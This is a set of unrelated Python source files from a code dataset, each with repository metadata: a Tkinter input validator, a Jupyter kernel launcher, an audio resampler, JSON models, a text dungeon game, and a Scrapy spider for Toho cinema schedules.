datetimes = []
if in_file_path.name == "":
messagebox.showerror("Input error (Main tab)", "No input file provided.")
return False
if not in_file_path.exists():
messagebox.showerror("Input File Error", "".join((file_name_appendage, "File with provided path could not be found.")))
return False
if in_file_path.suffix not in (".csv", ".html"):
messagebox.showerror("Input File Error", f'{file_name_appendage} Input file must have "csv" or "html" extension.')
return False
try:
# In the case of an HTML input, simply check for the presence of input file data
if in_file_path.suffix == ".html":
with open(in_file_path, "r") as f:
content = f.read()
if "NestIQ input data" in content:
return True
else:
messagebox.showerror("Input File Error", f'{file_name_appendage} HTML file does not contain the necessary information for processing.')
return False
with open(in_file_path, "r") as f:
lines = f.readlines()
master_list = [line.strip().rstrip(",").split(",") for line in lines]
pop_indices = []
# Remove lines not conforming to expected format (such as headers)
for i in range(len(master_list[:-1])):
# Cells in data point column must contain only numbers
if not str(master_list[i][0]).isnumeric():
pop_indices.append(i)
for pop_count, index in enumerate(pop_indices):
master_list.pop(index - pop_count)
master_list.pop(len(master_list) - 1)
prev_line = master_list[0]
if len(prev_line) < 3:
gui.air_valid = False
for line in master_list[1:]:
line = line[:4] if gui.air_valid else line[:3]
# Check if data points are continuous and sequential
try:
if not int(line[0]) == (int(prev_line[0]) + 1):
raise ValueError
except:
messagebox.showerror(
"Data Point Error",
f"{file_name_appendage}Error after data point "
+ f"{prev_line[0]}. Data point number is not sequential with regard to previous data point.",
)
return False
# Test conversion of date/time string to datetime object
try:
datetimes.append(niq_misc.convert_to_datetime(line[1]))
except ValueError:
messagebox.showerror(
"Date/Time Error", f"{file_name_appendage}Invalid date/time found for data point {line[0]}. Date/Time should be in MM/DD/YYYY HH:MM (:SS) format."
)
return False
# Check egg temperatures column
try:
float(line[2])
except:
messagebox.showerror("Temperature Error", f"{file_name_appendage}Invalid temperature given for data point {line[0]}.")
return False
# Check air temperatures column if appropriate
if gui.air_valid:
try:
float(line[3])
except (IndexError, ValueError):
gui.air_valid = False
if gui.show_warns_BV.get():
messagebox.showwarning(
"Air Temperature Warning",
f"{file_name_appendage}Invalid air temperature detected for data point "
+ f"{line[0]}. Air temperatures will not be plotted or included in statistical output.",
)
prev_line = line
# Lastly, check if date/times are continuous
return check_datetime_intervals()
except Exception as e:
print(e)
traceback.print_exc()
messagebox.showerror(
"Unknown Error",
f"{file_name_appendage}There was an unidentifiable error with the provided input file. "
+ "This is sometimes the result of 'extra' cells in the input file.\n\n"
+ "Please reference the NestIQ manual for details regarding proper input file format."
+ " This can be accessed by clicking 'Help' in the top right.",
)
return False
def check_out_file(gui, entry, title):
"""
Checks if the name provided for a given output file is valid. This includes asking the user if
they want to override if a file with the same name already exists.
Args:
entry (tk.Entry): entry box being examined
title (string): how to reference the current entry box if an error message is triggered
"""
if entry.get() == "":
messagebox.showerror(f"{title} Error", "File name is empty.")
return False
entry_path = Path(entry.get())
if entry_path.is_dir():
messagebox.showerror(f"{title} Error", "Directory provided but no file name.")
return False
# Add extension if not present
if entry == gui.plot_file_E:
ext = ".html"
elif entry == gui.stats_file_E or entry == gui.multi_in_stats_file_E:
ext = ".csv"
entry_path = Path(entry.get()).with_suffix(ext)
# Default to "output_files" directory if only filename (no dir) provided
if str(entry_path.parent) == ".":
entry_path = gui.master_dir_path / "output_files" / entry_path
replace_entry(entry, str(entry_path))
# Check if plot file already exists and if so, ask to override
if entry_path.exists():
if gui.show_warns_BV.get():
if not messagebox.askyesno("Override?", f"The file '{entry.get()}' already exists. Do you want to override?"):
return False
try:
entry_path.unlink()
except PermissionError:
messagebox.showerror(f"{title} Error", "File could not be overridden. Please ensure files are closed before overriding.")
return False
return True
# Check time entry boxes
for time_str in (gui.day_start_E.get(), gui.night_start_E.get()):
try:
time.strptime(time_str, "%H:%M")
except ValueError:
messagebox.showerror("Daytime Start/End Error", f"Provided value of {time_str} is invalid. Please provide times in 24 hr HH:MM (:SS) format.")
return False
# Check data smoothing box
try:
if not float(gui.smoothing_radius_E.get()).is_integer():
raise ValueError
if int(gui.smoothing_radius_E.get()) < 0:
messagebox.showerror("Data Smoothing Radius Error", "Data smoothing radius must be greater than or equal to zero.")
return False
except ValueError:
messagebox.showerror("Data Smoothing Radius Error", "Data smoothing radius must be an integer.")
return False
# Check duration threshold box
try:
if int(float(gui.dur_thresh_E.get())) < 0:
messagebox.showerror("Duration Threshold Error", "Duration threshold cannot be less than zero.")
return False
except ValueError:
messagebox.showerror("Duration Threshold Error", "Invalid duration threshold (could not convert to integer).")
return False
if not check_input_file(gui):
return False
if check_output:
if gui.make_plot_BV.get():
if not check_out_file(gui, gui.plot_file_E, "Plot File"):
return False
if gui.get_stats_BV.get():
if not check_out_file(gui, gui.stats_file_E, "Stats Output File"):
return False
if gui.multi_in_stats_BV.get() and first_in:
if not check_out_file(gui, gui.multi_in_stats_file_E, "Compile Summary"):
return False
return True
def check_valid_adv(gui):
"""
Checks for valid configuration of all parameters housed on the Advanced tab.
"""
def try_autofill():
"""
Checks if all Markov model parameter boxes are empty and runs unsupervised learning if so.
"""
for entry in (
gui.init_off_E,
gui.init_on_E,
gui.off_off_trans_E,
gui.off_on_trans_E,
gui.on_on_trans_E,
gui.on_off_trans_E,
gui.off_mean_E,
gui.on_mean_E,
gui.off_stdev_E,
gui.on_stdev_E,
):
if entry.get() != "":
return False
gui.unsupervised_learning(auto_run=True)
return True
try:
entries = (gui.init_off_E, gui.init_on_E, gui.off_off_trans_E, gui.off_on_trans_E, gui.on_on_trans_E, gui.on_off_trans_E)
for entry in entries:
if float(entry.get()) < 0:
raise ValueError("Probability less than 0 provided.")
except ValueError:
if try_autofill():
return True
messagebox.showerror("Parameter Error (Advanced tab)", "Probabilities must be real numbers greater than 0.")
return False
try:
    for mean in (gui.off_mean_E.get(), gui.on_mean_E.get()):
        float(mean)
except ValueError:
    messagebox.showerror("Parameter Error (Advanced tab)", "Means must be real numbers.")
    return False
try:
for stdev in (gui.off_stdev_E.get(), gui.on_stdev_E.get()):
if float(stdev) <= 0:
raise ValueError("Standard deviation less than 0 provided.")
except:
messagebox.showerror("Parameter Error (Advanced tab)", "Standard deviations must be real numbers greater than 0.")
return False
return True
def check_valid_plot_ops(gui):
"""
Checks for valid configuration of all parameters housed on the Plot Options tab.
"""
# Check plot dimensions
if gui.manual_plot_dims.get():
valid = True
try:
if int(gui.plot_dim_x_E.get()) < 1 or int(gui.plot_dim_y_E.get()) < 1:
valid = False
except:
valid = False
if not valid:
messagebox.showwarning(
"Plot Dimensions Warning",
("Provided plot dimensions are not valid; please provide positive integers. Automatic resolution detection will be used."),
)
gui.manual_plot_dims.set(0)
try:
if float(gui.title_font_size_E.get()) < 0:
raise ValueError("Provided plot title font size is less than 0")
except ValueError:
messagebox.showerror("Plot title Font Size Error (Plot Options tab)", "Invalid plot title font size was provided.")
return False
try:
if float(gui.axis_title_font_size_E.get()) < 0:
raise ValueError("Provided axis title font size is less than 0")
except ValueError:
messagebox.showerror("Axis Title Font Size Error (Plot Options tab)", "Invalid axis title font size was provided.")
return False
try:
if float(gui.axis_label_font_size_E.get()) < 0:
raise ValueError("Provided axis label font size is less than 0")
except ValueError:
messagebox.showerror("Axis Label Font Size Error (Plot Options tab)", "Invalid axis label font size was provided.")
return False
try:
if int(gui.axis_tick_size_E.get()) < 0:
raise ValueError("Provided axis tick size is less than 0")
except ValueError:
messagebox.showerror("Axis Tick Size Error (Plot Options tab)", "Invalid axis tick size was provided.")
return False
try:
if float(gui.legend_font_size_E.get()) < 0:
raise ValueError("Provided legend font size is less than 0")
except ValueError:
messagebox.showerror("Legend Font Size Error (Plot Options tab)", "Invalid legend font size was provided.")
return False
# Check plot element sizes/widths
try:
if float(gui.on_point_size_E.get()) < 0:
raise ValueError("Provided on-bout point size is less than 0")
except ValueError:
messagebox.showerror("Point Size Error (Plot Options tab)", "Invalid on-bout point size was provided.")
return False
try:
if float(gui.bout_line_width_E.get()) < 0:
raise ValueError("Provided bout line width is less than 0")
except ValueError:
messagebox.showerror("Line Width Error (Plot Options tab)", "Invalid bout line width was provided.")
return False
try:
if float(gui.air_line_width_E.get()) < 0:
raise ValueError("Provided air line width is less than 0")
except ValueError:
messagebox.showerror("Line Width Error (Plot Options tab)", "Invalid air temperature line width was provided.")
return False
if gui.show_day_markers_BV.get():
try:
if float(gui.day_marker_width_E.get()) < 0:
raise ValueError("Provided day marker size is less than 0")
except ValueError:
messagebox.showerror("Day Marker Size Error (Plot Options tab)", "Invalid day marker size was provided.")
return False
return True
def check_valid_stat_ops(gui):
"""
Checks for valid configuration of all parameters housed on the Stat Options tab.
"""
try:
float(gui.time_above_temper_E.get())
except:
messagebox.showerror("Custom Temperature Error (Stat Options tab)", 'Invalid "Time above" temperature.')
return False
try:
float(gui.time_below_temper_E.get())
except:
messagebox.showerror("Custom Temperature Error (Stat Options tab)", 'Invalid "Time below" temperature.')
return False
return True
avg_line_length: 38.198819 | max_line_length: 171 | alphanum_fraction: 0.588199
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 7656 (score 0.394537)

hexsha: 8bca7c3ef84914924b0c15217d9b07d51210a502 | size: 395 | ext: py | lang: Python
max_stars: repo_path: xrobot_launcher.py | repo_name: martinRenou/xeus-robot-wheel | head_hexsha: e14034c9e7c15417b9b125d3b03f660606df0b4e | licenses: ["BSD-3-Clause"] | count: null | events: null to null
max_issues: repo_path: xrobot_launcher.py | repo_name: martinRenou/xeus-robot-wheel | head_hexsha: e14034c9e7c15417b9b125d3b03f660606df0b4e | licenses: ["BSD-3-Clause"] | count: null | events: null to null
max_forks: repo_path: xrobot_launcher.py | repo_name: martinRenou/xeus-robot-wheel | head_hexsha: e14034c9e7c15417b9b125d3b03f660606df0b4e | licenses: ["BSD-3-Clause"] | count: null | events: null to null
if __name__ == '__main__':
def _xrobot_get_connection_filename():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', help='Jupyter kernel connection filename')
args, unknown = parser.parse_known_args()
return args.f
from xrobot import launch as _xrobot_launch
_xrobot_launch(_xrobot_get_connection_filename() or '')
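# Usage sketch (illustrative): Jupyter starts the kernel by invoking this launcher
# with a connection file, e.g.
#   python xrobot_launcher.py -f /path/to/kernel-12345.json
# The -f argument is parsed above and forwarded to xrobot.launch().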
avg_line_length: 35.909091 | max_line_length: 76 | alphanum_fraction: 0.701266
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 52 (score 0.131646)

hexsha: 8bcfdd9c7b143588acd04d3d0910371718e911e3 | size: 2977 | ext: py | lang: Python
max_stars: repo_path: amodem/sampling.py | repo_name: Matthew-MK/amodem | head_hexsha: a75dda9ab0f7445589a036357e604703ccb34726 | licenses: ["MIT"] | count: 766 | events: 2015-01-14T15:48:07.000Z to 2022-03-30T01:19:48.000Z
max_issues: repo_path: amodem/sampling.py | repo_name: Matthew-MK/amodem | head_hexsha: a75dda9ab0f7445589a036357e604703ccb34726 | licenses: ["MIT"] | count: 42 | events: 2015-01-02T18:50:11.000Z to 2022-03-11T19:10:35.000Z
max_forks: repo_path: amodem/sampling.py | repo_name: Matthew-MK/amodem | head_hexsha: a75dda9ab0f7445589a036357e604703ccb34726 | licenses: ["MIT"] | count: 116 | events: 2015-01-14T20:43:52.000Z to 2022-03-24T13:10:30.000Z
import itertools
import numpy as np
from . import common
class Interpolator:
def __init__(self, resolution=1024, width=128):
self.width = width
self.resolution = resolution
N = resolution * width
u = np.arange(-N, N, dtype=float)
window = np.cos(0.5 * np.pi * u / N) ** 2.0 # raised cosine
h = np.sinc(u / resolution) * window
self.filt = []
for index in range(resolution): # split into multiphase filters
filt = h[index::resolution]
filt = filt[::-1] # flip (due to convolution)
self.filt.append(filt)
lengths = [len(f) for f in self.filt]
self.coeff_len = 2 * width
assert set(lengths) == set([self.coeff_len]) # verify same lengths
assert len(self.filt) == resolution
defaultInterpolator = Interpolator()
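# Note (illustrative): with resolution=4, the slices h[0::4], h[1::4], h[2::4] and
# h[3::4] would form four sub-filters, each sampling the windowed sinc at a
# different fractional delay (0, 1/4, 1/2 and 3/4 of a sample period).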
class Sampler:
def __init__(self, src, interp=None, freq=1.0):
self.freq = freq
self.equalizer = lambda x: x # LTI equalization filter
if interp is not None:
self.interp = interp
self.resolution = self.interp.resolution
self.filt = self.interp.filt
self.width = self.interp.width
# polyphase filters are centered at (width + 1) index
padding = [0.0] * self.interp.width
# pad with zeroes to "simulate" regular sampling
self.src = itertools.chain(padding, src)
self.offset = self.interp.width + 1
# samples' buffer to be used by interpolation
self.buff = np.zeros(self.interp.coeff_len)
self.index = 0
self.take = self._take
else:
# skip interpolation (for testing)
src = iter(src)
self.take = lambda size: common.take(src, size)
def _take(self, size):
frame = np.zeros(size)
count = 0
for frame_index in range(size):
offset = self.offset
# offset = k + (j / self.resolution)
k = int(offset) # integer part
j = int((offset - k) * self.resolution) # fractional part
coeffs = self.filt[j] # choose correct filter phase
end = k + self.width
# process input until all buffer is full with samples
try:
while self.index < end:
self.buff[:-1] = self.buff[1:]
self.buff[-1] = next(self.src) # throws StopIteration
self.index += 1
except StopIteration:
break
self.offset += self.freq
# apply interpolation filter
frame[frame_index] = np.dot(coeffs, self.buff)
count = frame_index + 1
return self.equalizer(frame[:count])
def resample(src, dst, df=0.0):
x = common.load(src)
sampler = Sampler(x, Interpolator())
sampler.freq += df
y = sampler.take(len(x))
dst.write(common.dumps(y))
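# Usage sketch (illustrative, with placeholder data): resample a short sine wave
# with a small clock offset using the classes above.
#
#   import numpy as np
#   x = np.sin(2 * np.pi * 0.05 * np.arange(1000))
#   sampler = Sampler(iter(x), defaultInterpolator, freq=1.0 + 1e-4)
#   y = sampler.take(900)  # interpolated samples at the slightly faster rate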
avg_line_length: 32.010753 | max_line_length: 75 | alphanum_fraction: 0.555929
count_classes: 2690 (score 0.903594) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 498 (score 0.167282)

hexsha: 8bcfe7bd84165cc2d8ec0ab76054e252d5ad9337 | size: 2913 | ext: py | lang: Python
max_stars: repo_path: rando/core/models.py | repo_name: camillemonchicourt/Geotrek-rando | head_hexsha: df92c0f19ca37ea1750d934cedafcdb23325bc95 | licenses: ["BSD-2-Clause"] | count: null | events: null to null
max_issues: repo_path: rando/core/models.py | repo_name: camillemonchicourt/Geotrek-rando | head_hexsha: df92c0f19ca37ea1750d934cedafcdb23325bc95 | licenses: ["BSD-2-Clause"] | count: null | events: null to null
max_forks: repo_path: rando/core/models.py | repo_name: camillemonchicourt/Geotrek-rando | head_hexsha: df92c0f19ca37ea1750d934cedafcdb23325bc95 | licenses: ["BSD-2-Clause"] | count: null | events: null to null
import os
import json
import datetime
from easydict import EasyDict as edict
from django.conf import settings
from rando import logger
from rando.core import classproperty
class JSONManager(object):
def __init__(self, klass=object, filepath='', language=None, use_tmp=False):
self.klass = klass
self.filepath = filepath
self.language = language
self.use_tmp = use_tmp
def filter(self, **kwargs):
self.__dict__.update(**kwargs)
return self
@property
def fullpath(self):
self.filepath = self.filepath.format(**self.__dict__)
base_path = settings.INPUT_DATA_ROOT if not self.use_tmp else settings.INPUT_TMP_ROOT
return os.path.join(base_path, self.language or '', self.filepath)
@property
def content(self):
try:
logger.debug("Read content from %s" % self.fullpath)
with open(self.fullpath, 'r') as f:
content = f.read()
return content
except IOError:
logger.error("Could not read '%s'" % self.fullpath)
return '[]'
def all(self):
"""
Instantiate objects on the fly
We use edict() in order to recursively transform dicts into attributes.
(ex.: object['properties']['districts'][0]['pk'] becomes
object.properties.districts[0].pk)
"""
objects = self._read_content()
if isinstance(objects, (list, tuple)):
return [self.klass(objects=self, **edict(o)) for o in objects]
assert isinstance(objects, dict)
return self.klass(objects=self, **edict(objects))
def _read_content(self):
return json.loads(self.content)
class GeoJSONManager(JSONManager):
def _read_content(self):
geojson = super(GeoJSONManager, self)._read_content()
return geojson.get('features', []) if len(geojson) > 0 else []
class JSONModel(object):
filepath = None
manager_class = JSONManager
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
@property
def last_modified(self):
t = os.path.getmtime(self.objects.fullpath)
return datetime.datetime.fromtimestamp(t)
@property
def pk(self):
return self.properties.pk
@classproperty
def objects(cls):
return cls.manager_class(cls, cls.filepath)
@classproperty
def tmp_objects(cls):
return cls.manager_class(cls, cls.filepath, use_tmp=True)
_default_manager = objects
class GeoJSONModel(JSONModel):
manager_class = GeoJSONManager
@property
def geojson(self):
return json.dumps({
"type": "Feature",
"geometry": { "type": self.geometry.type,
"coordinates": self.geometry.coordinates
},
"properties": self.properties,
})
class Settings(JSONModel):
filepath = 'api/settings.json'
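# Usage sketch (illustrative): load the parsed settings object, assuming
# settings.INPUT_DATA_ROOT contains an "api/settings.json" file.
#
#   settings_obj = Settings.objects.all()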
avg_line_length: 27.481132 | max_line_length: 93 | alphanum_fraction: 0.632338
count_classes: 2724 (score 0.935118) | count_generators: 0 (score 0) | count_decorators: 1250 (score 0.429111) | count_async_functions: 0 (score 0) | count_documentation: 387 (score 0.132853)

hexsha: 8bd1ed48c83c831815502fd8f24e3c648f5c81ee | size: 3741 | ext: py | lang: Python
max_stars: repo_path: libs/dungeon.py | repo_name: IdeaBot/explorer | head_hexsha: 2cd02cacb2a37f3da3308e79e88f8c26f4401b8e | licenses: ["MIT"] | count: null | events: null to null
max_issues: repo_path: libs/dungeon.py | repo_name: IdeaBot/explorer | head_hexsha: 2cd02cacb2a37f3da3308e79e88f8c26f4401b8e | licenses: ["MIT"] | count: null | events: null to null
max_forks: repo_path: libs/dungeon.py | repo_name: IdeaBot/explorer | head_hexsha: 2cd02cacb2a37f3da3308e79e88f8c26f4401b8e | licenses: ["MIT"] | count: null | events: null to null
'''
Dungeon object class
created 2019-03-19 by NGnius
'''
# import math
import random
DEFAULT_SIZE = 16
WIDTH = 42
ANIMATION_CHAR = '*'
BLANK_CHAR = '.'
PORTAL_CHAR = '0'
class Dungeon():
def __init__(self, size=DEFAULT_SIZE, level=1):
self.WIDTH = WIDTH
self.size = size
self.level = level
# make board
self._board = self._make_board()  # list of lists; WIDTH columns by size rows
self._animated_board = self._make_board()
# 2 randomly placed portals
self.portals = (self.find_random_location(), self.find_random_location())
def animate(self, fr, to, _char=ANIMATION_CHAR):
vector = (to[0]-fr[0], to[1]-fr[1])
n = (vector[0]**2 + vector[1]**2)**(0.5)
uvector = (vector[0]/n, vector[1]/n)
# print(uvector, 'is your vector, Victor')
for i in range(1, max(abs(vector[0]), abs(vector[1]))):
self._animated_board[fr[0]+round(i*uvector[0])][fr[1]+round(i*uvector[1])] = _char
self._animated_board[to[0]][to[1]] = _char # just in case it's missed by vector drawing
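    # Worked example (illustrative): animate((0, 0), (4, 2)) gives vector (4, 2),
    # n = sqrt(20) ~ 4.47 and unit vector ~ (0.894, 0.447), so the intermediate
    # cells (1, 0), (2, 1) and (3, 1) are marked before the endpoint is set.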
def move_place(self, obj, coords):
if self._verify_coords(coords):
self._board[coords[0]][coords[1]] = obj
def move_swap(self, coords1, coords2):
if self._verify_coords(coords1) and self._verify_coords(coords2):
self._board[coords1[0]][coords1[1]], self._board[coords2[0]][coords2[1]] = self._board[coords2[0]][coords2[1]], self._board[coords1[0]][coords1[1]]
def _make_board(self, fill=None):
board = list()
for x in range(WIDTH):
board.append(list())
for y in range(self.size):
board[x].append(fill)
return board
def draw_board(self, blank=BLANK_CHAR):
board_str = ''
for y in range(self.size):
row_str = ''
for x in range(WIDTH):
if self._animated_board[x][y] is not None:
row_str += self._animated_board[x][y]
self._animated_board[x][y] = None # reset animations as we go
elif (x,y) in self.portals:
row_str += PORTAL_CHAR
elif self._board[x][y] is not None:
row_str += self._board[x][y].char
else:
row_str += blank
board_str = '\n' + row_str + board_str
return board_str
def do_turn(self):
done_turn = list()
# do move or attack for people on board
for x in range(WIDTH):
for y in range(self.size):
person = self._board[x][y]
if person is not None and person.name not in done_turn:
# print('Move/Attacking', person.name)
person.move_or_attack()
done_turn.append(person.name)
def get_person(self, coords):
if coords[0] >= WIDTH or coords[1] >= self.size:
return
return self._board[coords[0]][coords[1]]
def find_person(self, name):
for x in range(WIDTH):
for y in range(self.size):
person = self._board[x][y]
if person is not None:
if person.name == name:
return (x,y)
def find_random_location(self):
        person_at = True  # any non-None value, so the loop body runs at least once
while person_at is not None:
            coords = (random.randrange(0, WIDTH), random.randrange(0, self.size))  # x spans the full board width
person_at = self.get_person(coords)
return coords
def _verify_coords(self, coords):
if coords[0] >= WIDTH or coords[0] < 0:
return False
if coords[1] >= self.size or coords[1] < 0:
return False
return True
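# Smoke test (editor's addition): Stub is a hypothetical minimal "person";
# the real game presumably supplies richer objects with these attributes.
class Stub:
    char = '@'
    name = 'hero'
    def move_or_attack(self):
        pass  # no-op for the smoke test

d = Dungeon()
d.move_place(Stub(), (3, 5))
d.animate((0, 0), (10, 8))
print(d.draw_board())
d.do_turn()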
| 35.971154
| 159
| 0.555199
| 3,566
| 0.953221
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.092489
|
8bd259e0e2d2b9af5c910c05de23636129ffb891
| 113
|
py
|
Python
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/fflush.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
f = open("test.txt", mode="r+")  # "r+" requires that test.txt already exists
f.write("hello world")  # overwrites from the start of the file
f.flush()  # push the buffered write to the OS
f.truncate(f.tell())  # drop any leftover bytes past the new content
f.close()
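# Equivalent sketch using a context manager (editor's addition), so the file
# is closed even if a write fails; still assumes test.txt already exists.
with open("test.txt", mode="r+") as f:
    f.write("hello world")
    f.truncate(f.tell())  # truncate flushes internally; close is implicit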
| 14.125
| 31
| 0.610619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 42
| 0.371681
|
8bd2af77c54189a911eb6a57a33e86e0c8005dbd
| 10,917
|
py
|
Python
|
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | 2
|
2018-06-07T13:28:03.000Z
|
2018-12-10T14:04:53.000Z
|
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | null | null | null |
scrapyproject/showingspiders/toho_v2.py
|
gas1121/JapanCinemaStatusSpider
|
67c7b963914565589f64dd1bcf18839a4160ea34
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import unicodedata
import json
import arrow
import scrapy
from scrapyproject.showingspiders.showing_spider import ShowingSpider
from scrapyproject.items import (ShowingLoader, init_show_booking_loader)
from scrapyproject.utils import TohoUtil
class TohoV2Spider(ShowingSpider):
"""
Toho site spider version 2.
    Improves crawling speed by fetching data from the JSON API instead of scraping site pages.
useful json api:
theater list:
https://hlo.tohotheater.jp/responsive/json/theater_list.json?_dc=1488106193
movies showing now:
https://hlo.tohotheater.jp/data_net/json/movie/TNPI3090.JSON
movies coming soon:
https://hlo.tohotheater.jp/data_net/json/movie/TNPI3080.JSON
time schedule table:
https://hlo.tohotheater.jp/net/schedule/TNPI3070J02.do?
__type__=json&movie_cd=014174&vg_cd=028&term=99&seq_disp_term=7
&site_cd=&enter_kbn=&_dc=1488106557
detail schedule table for movie:
https://hlo.tohotheater.jp/net/schedule/TNPI3070J01.do?
__type__=json&movie_cd=014174&vg_cd=028&show_day=20170226
&term=99&isMember=&site_cd=028&enter_kbn=&_dc=1488106558
    cinema schedule table:
https://hlo.tohotheater.jp/net/schedule/TNPI3050J02.do?
__type__=html&__useResultInfo__=no&vg_cd=076&show_day=20170226
&term=99&isMember=&enter_kbn=&_dc=1488120297
Visit page example:
https://www.tohotheater.jp/theater/find.html
https://hlo.tohotheater.jp/net/movie/TNPI3090J01.do
https://hlo.tohotheater.jp/net/movie/TNPI3060J01.do?sakuhin_cd=014174
https://hlo.tohotheater.jp/net/ticket/034/TNPI2040J03.do
    We first crawl the cinema list, then each cinema's schedule data,
    and finally generate booking page URLs to crawl the exact booking numbers.
"""
name = "toho_v2"
allowed_domains = ["hlo.tohotheater.jp", "www.tohotheater.jp"]
start_urls = [
'https://hlo.tohotheater.jp/responsive/json/theater_list.json'
]
def parse(self, response):
"""
crawl theater list data first
"""
try:
theater_list = json.loads(response.text)
except json.JSONDecodeError:
return
if (not theater_list):
return
for curr_cinema in theater_list:
cinema_name_list = self.get_cinema_name_list(curr_cinema)
if not self.is_cinema_crawl(cinema_name_list):
continue
site_cd = curr_cinema['VIT_GROUP_CD']
show_day = self.date
curr_cinema_url = self.generate_cinema_schedule_url(
site_cd, show_day)
request = scrapy.Request(curr_cinema_url,
callback=self.parse_cinema)
yield request
def get_cinema_name_list(self, curr_cinema):
# replace full width text before compare
vit_group_nm = unicodedata.normalize('NFKC',
curr_cinema['VIT_GROUP_NM'])
theater_name = unicodedata.normalize('NFKC',
curr_cinema['THEATER_NAME'])
theater_name_english = unicodedata.normalize(
'NFKC', curr_cinema['THEATER_NAME_ENGLISH'])
site_name = unicodedata.normalize('NFKC', curr_cinema['SITE_NM'])
return [vit_group_nm, theater_name, theater_name_english, site_name]
def generate_cinema_schedule_url(self, site_cd, show_day):
"""
json data url for single cinema, all movies of curr cinema
"""
url = 'https://hlo.tohotheater.jp/net/schedule/TNPI3050J02.do?'\
'__type__=html&__useResultInfo__=no'\
'&vg_cd={site_cd}&show_day={show_day}&term=99'.format(
site_cd=site_cd, show_day=show_day)
return url
def parse_cinema(self, response):
# some cinemas may not open and will return empty response
try:
schedule_data = json.loads(response.text)
except json.JSONDecodeError:
return
if (not schedule_data):
return
result_list = []
for curr_cinema in schedule_data:
showing_url_parameter = {}
date_str = curr_cinema['showDay']['date']
showing_url_parameter['show_day'] = arrow.get(
date_str, 'YYYYMMDD').replace(tzinfo='UTC+9')
for sub_cinema in curr_cinema['list']:
self.parse_sub_cinema(
response, sub_cinema, showing_url_parameter, result_list)
for result in result_list:
if result:
yield result
def parse_sub_cinema(self, response, sub_cinema,
showing_url_parameter, result_list):
site_cd = sub_cinema['code']
showing_url_parameter['site_cd'] = site_cd
data_proto = ShowingLoader(response=response)
data_proto.add_cinema_name(sub_cinema['name'])
cinema_site = TohoUtil.generate_cinema_homepage_url(site_cd)
data_proto.add_cinema_site(cinema_site, sub_cinema['name'])
data_proto.add_value('source', self.name)
for curr_movie in sub_cinema['list']:
self.parse_movie(response, curr_movie, showing_url_parameter,
data_proto, result_list)
def parse_movie(self, response, curr_movie,
showing_url_parameter, data_proto, result_list):
"""
parse movie showing data
movie may have different versions
"""
movie_data_proto = ShowingLoader(response=response)
movie_data_proto.add_value(None, data_proto.load_item())
movie_data_proto.add_title(
title=curr_movie['name'], title_en=curr_movie['ename'])
title_list = movie_data_proto.get_title_list()
if not self.is_movie_crawl(title_list):
return
showing_url_parameter['movie_cd'] = curr_movie['code']
for curr_screen in curr_movie['list']:
self.parse_screen(response, curr_screen, showing_url_parameter,
movie_data_proto, result_list)
def parse_screen(self, response, curr_screen,
showing_url_parameter, data_proto, result_list):
showing_url_parameter['theater_cd'] = curr_screen['theaterCd']
showing_url_parameter['screen_cd'] = curr_screen['code']
screen_data_proto = ShowingLoader(response=response)
screen_data_proto.add_value(None, data_proto.load_item())
screen_data_proto.add_screen_name(curr_screen['ename'])
for curr_showing in curr_screen['list']:
# filter empty showing
if not curr_showing['unsoldSeatInfo']:
continue
self.parse_showing(response, curr_showing, showing_url_parameter,
screen_data_proto, result_list)
def parse_showing(self, response, curr_showing,
showing_url_parameter, data_proto, result_list):
def parse_time(time_str):
"""
ex. "24:40"
"""
time = time_str.split(":")
return (int(time[0]), int(time[1]))
showing_url_parameter['showing_cd'] = curr_showing['code']
showing_data_proto = ShowingLoader(response=response)
showing_data_proto.add_value(None, data_proto.load_item())
# time like 24:40 can not be directly parsed,
# so we need to shift time properly
start_hour, start_minute = parse_time(curr_showing['showingStart'])
showing_data_proto.add_value('start_time', self.get_time_from_text(
start_hour, start_minute))
end_hour, end_minute = parse_time(curr_showing['showingEnd'])
showing_data_proto.add_value('end_time', self.get_time_from_text(
end_hour, end_minute))
showing_data_proto.add_value('seat_type', 'NormalSeat')
# query screen number from database
showing_data_proto.add_total_seat_count()
# check whether need to continue crawl booking data or stop now
if not self.crawl_booking_data:
result_list.append(showing_data_proto.load_item())
return
booking_data_proto = init_show_booking_loader(response=response)
booking_data_proto.add_value('showing', showing_data_proto.load_item())
book_status = curr_showing['unsoldSeatInfo']['unsoldSeatStatus']
booking_data_proto.add_book_status(book_status, util=TohoUtil)
book_status = booking_data_proto.get_output_value('book_status')
if book_status in ['SoldOut', 'NotSold']:
# sold out or not sold
total_seat_count = showing_data_proto.get_output_value(
'total_seat_count')
book_seat_count = (
total_seat_count if book_status == 'SoldOut' else 0)
booking_data_proto.add_value('book_seat_count', book_seat_count)
booking_data_proto.add_time_data()
result_list.append(booking_data_proto.load_item())
return
else:
# normal, need to crawl book number on order page
url = self.generate_showing_url(**showing_url_parameter)
request = scrapy.Request(url,
callback=self.parse_normal_showing)
request.meta["data_proto"] = booking_data_proto.load_item()
result_list.append(request)
